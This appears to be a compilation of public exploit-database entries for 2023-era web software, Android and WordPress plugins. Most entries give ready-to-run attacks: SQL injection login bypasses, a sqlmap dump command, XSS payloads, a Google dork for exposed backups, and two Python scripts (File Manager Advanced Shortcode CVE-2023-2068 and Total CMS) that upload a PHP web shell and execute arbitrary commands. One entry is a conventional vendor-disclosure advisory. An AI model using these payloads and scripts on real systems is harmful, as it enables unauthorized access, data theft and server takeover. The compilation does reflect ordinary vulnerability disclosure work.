<pre><code>====================================================================================================================================<br />| # Title : WordPress - WPtouch Pro 4 Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : wptouch.com | <br />| # Dork : /wp-content/wptouch-data/backups |<br />====================================================================================================================================<br /><br />P0C :<br /><br />[+] The plugin exports a backup copy of its own settings to an exposed, unprotected folder, so the attacker can download a backup copy.<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /wp-content/wptouch-data/backups/<br /><br />[+] https://127.0.0.1/spcporg/wp-content/wptouch-data/backups/wptouch-backup-7cbc55e8c65196efd2fd93657cb370af-20181208-055325.txt<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)<br /># Date of found: 18/05/2023<br /># Exploit Author: VIVEK CHOUDHARY @sudovivek<br /># Version: V1.0<br /># Tested on: Windows 10<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html<br /># CVE: CVE-2023-33584<br /># CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584<br /><br />Vulnerability Description -<br /><br /> Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.<br /><br /><br />Steps to Reproduce -<br /><br /> The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:<br /><br /> 1. Launch the Enrollment System Project V1.0 application.<br /><br /> 2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.<br /><br /> 3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}.<br /><br /> 4. Click the login button to execute the SQL Injection payload.<br /><br /><br />As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.totalcms.co/ │<br />│ Vendor : Joe Workman │<br />│ Software : Total CMS 1.7.4 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /blog/<br /><br />GET parameter 'search' is vulnerable to RXSS<br /><br />https://website/blog/?search=yw1cz%22%3e%3cscript%3ealert(1)%3c%2fscript%3eeht7y<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 2023-06-03<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://barebonescms.com/<br /># Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip<br /># Version: v2.0.2<br /># Tested : https://demo.barebonescms.com/<br /><br /><br />--- Description ---<br /><br />1) Login admin panel and go to new story : <br />https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540<br />2) Click edit button and write your payload in the title field:<br />Payload: "><script>alert(1)</script><br />3) After save change and will you see alert button<br /><br /><br />POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1<br />Host: demo.barebonescms.com<br />Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 237<br />Origin: https://demo.barebonescms.com<br />Dnt: 1<br />Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=<br /></code></pre>
<pre><code># Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)<br /># Date: 05/31/2023<br /># Exploit Author: Mateus Machado Tesser<br /># Vendor Homepage: https://advancedfilemanager.com/<br /># Version: File Manager Advanced Shortcode 2.3.2<br /># Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15<br /># CVE: CVE-2023-2068<br /><br />import requests<br />import json<br />import pprint<br />import sys<br />import re<br /><br />PROCESS = "\033[1;34;40m[*]\033[0m"<br />SUCCESS = "\033[1;32;40m[+]\033[0m"<br />FAIL = "\033[1;31;40m[-]\033[0m"<br /><br />try:<br /> COMMAND = sys.argv[2]<br /> IP = sys.argv[1]<br /> if len(COMMAND) > 1:<br /> pass<br /> if IP:<br /> pass<br /> else:<br /> print(f'Use: {sys.argv[0]} IP COMMAND')<br />except:<br /> pass<br /><br />url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel<br />print(f"{PROCESS} Searching fmakey")<br /><br />try:<br /> r = requests.get(url)<br /> raw_fmakey = r.text<br /> fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]<br /> if len(fmakey) == 0:<br /> print(f"{FAIL} Cannot found fmakey!")<br />except:<br /> print(f"{FAIL} Cannot found fmakey!")<br /><br />print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')<br />url = "http://"+IP+"/wp-admin/admin-ajax.php"<br />headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}<br />data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"<br />data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"<br />r = requests.post(url, headers=headers, data=data)<br />print(f"{PROCESS} Sending AJAX request to: {url}")<br />if 'errUploadMime' in r.text:<br /> print(f'{FAIL} Exploit failed!')<br /> sys.exit()<br />elif r.headers['Content-Type'].startswith("text/html"):<br /> print(f'{FAIL} Exploit failed! Try to change _fmakey')<br /> sys.exit(0)<br />else:<br /> print(f'{SUCCESS} Exploit executed with success!')<br />exploited = json.loads(r.text)<br />url = ""<br />print(f'{PROCESS} Getting URL with webshell')<br />for i in exploited["added"]:<br /> url = i['url']<br />print(f"{PROCESS} Executing '{COMMAND}'")<br />r = requests.get(url+'?cmd='+COMMAND)<br />print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)<br /> <br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Circle progress bar – Cross site<br />scripting-Stored<br /># Date: 2-06-2023<br /># Exploit Author: Taliya Bilal- NightHawk<br /># Vendor Homepage: https://wordpress.org/plugins/circle-progress-bar/<br /># Version: 1.0<br /># Tested on: Firefox<br /># Contact me: taliyabilal765@gmail.com<br /><br /># Steps to reproduce:<br />1. Install Circle progress bar and activate plugin.<br />2. Navigate to Circle progress bar plugin.<br />3. Fill the title field with xss payload <img src=x onerror=alert(1)><br />4. Click the option preview post. Here the popup will appear.<br /><br />#Screenshot:https://freeimage.host/i/Hrbmskvhttps://freeimage.host/i/Hrbmy4n<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: FC Red Bull Salzburg App<br />Vendor URL: https://play.google.com/store/apps/details?id=laola.redbull<br />Type: Improper Authorization in Handler for Custom URL Scheme [CWE-939]<br />Date found: 2023-04-06<br />Date published: 2023-06-01<br />CVSSv3 Score: 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)<br />CVE: CVE-2023-29459<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />FC Red Bull Salzburg App <= 5.1.9-R<br /><br /><br />4. INTRODUCTION<br />===============<br />Die FC Red Bull Salzburg-App bietet allen Fans innovative Features, die ein<br />modernes Stadionerlebnis ermöglichen.<br /><br />Mit verschiedenen Livecams, die nur innerhalb der Red Bull Arena abrufbar<br />sind und das Spielgeschehen aus unterschiedlichen Perspektiven zeigen, sowie<br />auch Sofortwiederholungen aller wichtigen Szenen wird der Besuch in der Red<br />Bull Arena auf ein neues Level gehievt.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The "FC Red Bull Salzburg App" app for Android exposes an activity called<br />"at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity".<br /><br />This activity aims to show the contents of a given URL within the app's context.<br />However, the app does not properly validate the URL and the intent's data URI,<br />which an unauthenticated attacker can abuse to load arbitrary contents into the<br />app by either tricking the user into opening a specifically crafted link or using<br />a malicious app on the same device.<br /><br />The specific problem here is the assumed trust between the user having the app<br />installed and what the app is actually doing/displaying to the user. So if the<br />user sees the app being loaded and automatically redirecting to another page, it<br />can be assumed that the user also trusts the loaded page.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />There are two ways to exploit this vulnerability:<br /><br />1. Via the app's custom URI scheme "fcrbs" followed by any arbitrary URL:<br />fcrbs://www.rcesecurity.com<br /><br />2. Via an explicit intent invocation:<br />Intent i = new Intent();<br />i.setComponent(new ComponentName("laola.redbull", "at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity"));<br />i.setData(Uri.parse("https://www.rcesecurity.com"));<br />startActivity(i);<br /><br /><br />7. SOLUTION<br />===========<br />None. Uninstall the app.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-04-06: Discovery of the vulnerability<br />2023-04-06: RCE Security sends initial notification to vendor via security@redbull.com and to soc@redbull.com<br />2023-04-06: RCE Security asks Intigriti.com for a security contact because of a disagreement with Intigriti's disclosure terms<br />2023-04-06: Intigriti states that they don't hand out contact email addresses of customers<br />2023-04-06: MITRE assigns CVE-2023-29459<br />2023-04-07: Vendor responds stating to submit everything via Intigriti<br />2023-04-07: RCE Security asks for another way to report due to the unacceptable T&Cs of Intigriti<br />2023-04-11: Vendor responds stating that a report to soc@redbull.com is sufficient<br />2023-04-11: RCE Security provides a preliminary version of this advisory<br />2023-04-19: Vendor acknowledges the vulnerability<br />2023-04-19: RCE Security extends disclsoure date to its maxiumum of 45 days<br />2023-05-07: No Response from vendor<br />2023-05-07: RCE Security asks vendor for an update since disclosure date is coming<br />2023-05-11: No Response from vendor<br />2023-05-11: RCE Security asks vendor for an update<br />2023-05-12: Vendor response stating that more time is needed to fix the bug since the developers are not within the organization<br />2023-05-15: RCE Security reminds the vendor of the disclosure policy and date<br />2023-05-27: No response from vendor<br />2023-05-27: RCE Security sends one last notification and adjusted the disclosure date to 01st June 2023<br />2023-06-01: No response from vendor<br />2023-06-01: Public Disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29459<br /></code></pre>
<pre><code># Title: MotoCMS Version 3.4.3 - SQL Injection<br /># Author: tmrswrr<br /># Date: 01/06/2023<br /># Vendor: https://www.motocms.com<br /># Link: https://www.motocms.com/website-templates/demo/189526.html<br /># Vulnerable Version(s): MotoCMS 3.4.3<br /><br /><br />## Description<br />MotoCMS Version 3.4.3 SQL Injection via the keyword parameter.<br /><br />## Steps to Reproduce<br /><br />1) By visiting the url:<br />https://template189526.motopreview.com/store/category/search/?keyword=1<br /><br />2) Run sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch and this command sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump<br /><br />### Parameter & Payloads ###<br /><br />Parameter: keyword (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV<br /><br />Parameter: #1* (URI)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE<br /> <br /></code></pre>
<pre><code>## Title: Advance Charity Management-1.0 - TLS cookie without secure<br />flag set-PHPSESSID NEVER EXPIRATION-current session-Hijacking<br />## Author: nu11secur1ty<br />## Date: 06.04.2023<br />## Vendor: https://www.sourcecodester.com/users/aown-shah<br />## Software: https://www.sourcecodester.com/php/16607/advance%C2%A0charity-management-system.html<br />## Reference: https://portswigger.net/kb/issues/00500600_cookie-without-httponly-flag-set<br /><br />## Description:<br />The following cookie was issued by the application and does not have<br />the secure flag set:<br />PHPSESSID: The cookie appears to contain a session token, which may<br />increase the risk associated with this issue. You should review the<br />contents of the cookie to determine its function. The attacker can use<br />the same browser on the same machine to connect with the already<br />logged user before this moment, end he can do very nasty stuff with<br />this already authenticated account. This is a 100% CRITICAL SITUATION<br />if this will happen<br />inside of the network level 2 of some companies.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />```GET<br />GET /pwnedhost7/members/ HTTP/1.1<br />Host: pwnedhost7.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Referer: https://pwnedhost7.com/pwnedhost7/<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="114", "Chromium";v="114"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />[+]Response:<br />```HTTP<br />HTTP/1.1 200 OK<br />Date: Sun, 04 Jun 2023 10:13:00 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Set-Cookie: PHPSESSID=hudiao5n9p6rjld5oaju24lbca; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 25629<br /><br /><script type="text/javascript">window.location="login.php"; </script><br /><br /><b>Notice</b>: Undefined index: rainbow_uid in<br /><b>C:\xampp7.4\htdocs\pwnedhost7\members\header.php</b> on line<br /><b>7</b><br /><br /><br /><br /><b>Warning</b>: mysqli_fetch_assoc() expects parameter 1 to be<br />mysqli_result, bool given in<br /><b>C:\xampp7.4\htdocs\pwnedhost7\members\header.php</b> on line<br /><b>12</b><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Aown-Shah/2023/Advance-Charity-Management-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/advance-charity-management-10-tls.html)<br /><br />## Time spend:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) <br /># Date: 03/06/2023<br /># Exploit Author: tmrswrr<br /># Version: 1.7.4<br /># Vendor home page : https://www.totalcms.co/<br /># Tested Url : https://www.totalcms.co/demo/soccer/<br />#PLatform : MACOSX<br /><br />1) Go to this page and click edit page button<br />https://localhost/demo/soccer/<br />2)After go down and will you see downloads area <br />3)Add in this area shell.php file<br /><br /><br />?PNG<br />...<br /><?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?><br />IEND<br /><br />4) After open this file and write commands<br /><br />https://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=id<br />Result :<br /><br />?PNG ...<br /><br />uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)<br /><br />IEND <br /><br />Exploit: <br /><br />import requests<br /><br />url = input("Enter the URL: ")<br />urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"<br /><br />headers = {<br /> 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'application/json',<br /> 'Accept-Language': 'en-US,en;q=0.5',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Cache-Control': 'no-cache',<br /> 'X-Requested-With': 'XMLHttpRequest',<br /> 'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',<br /> 'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',<br /> 'Origin': urll,<br /> 'Dnt': '1',<br /> 'Referer': f'{urll}/demo/soccer/admin/',<br /> 'Sec-Fetch-Dest': 'empty',<br /> 'Sec-Fetch-Mode': 'cors',<br /> 'Sec-Fetch-Site': 'same-origin',<br /> 'Te': 'trailers',<br /> 'Connection': 'close'<br />}<br /><br />data = '''\<br />-----------------------------17104855723143716151436432930\r\n<br />Content-Disposition: form-data; name="slug"\r\n<br />\r\n<br />cmssoccerdepot\r\n<br />-----------------------------17104855723143716151436432930\r\n<br />Content-Disposition: form-data; name="type"\r\n<br />\r\n<br />depot\r\n<br />-----------------------------17104855723143716151436432930\r\n<br />Content-Disposition: form-data; name="file"; filename="hey.php"\r\n<br />Content-Type: application/x-php\r\n<br />\r\n<br />?PNG<br />...<br /><?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?><br />IEND\r\n<br />\r\n<br />-----------------------------17104855723143716151436432930--'''<br /><br />while True:<br /> command = input("WRITE YOUR COMMAND ('exit' to quit): ")<br /><br /> if command.lower() == "exit":<br /> break<br /><br /> response = requests.post(url, headers=headers, data=data)<br /><br /> if response.status_code == 200:<br /> shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'<br /> shell_url = url + shell_path<br /> print(shell_url)<br /> shell_response = requests.get(shell_url)<br /> print(shell_response.text)<br /> else:<br /> print('Failed to execute the request.')<br /><br /></code></pre>